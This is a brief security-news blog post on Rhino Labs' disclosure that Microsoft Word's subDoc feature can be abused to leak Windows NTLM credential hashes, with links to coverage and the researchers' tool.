Rhino Labs has discovered a new way to get your Windows credentials using the subDoc feature of Microsoft Word. The bad guys insert a sub-document into a Word file from a server out on the internet.
How does it work?
This sub-document tricks the PC into giving up the NTLM hash needed for authentication. Once they have this they can use the passwords found to get into the compromised computer or network. About the only way to avoid this is to only open trusted Word files.
“As this feature has not been recognized publicly as an attack vector for malicious actions, it is not something that is recognized by anti-virus software,” Rhino Labs says, highlighting that none of the antivirus engines on VirusTotal detected Word documents weaponized via the subDoc method.
I wonder if Microsoft is going to disable this feature like they did the DDE support in Word because of similar abuse by hackers?
- Microsoft Word subDoc Feature Abused to Steal Windows Credentials (bleepingcomputer.com)
- subdoc_injector.py (github.com)
- Background: Microsoft Office Exploitation (rhinosecuritylabs.com)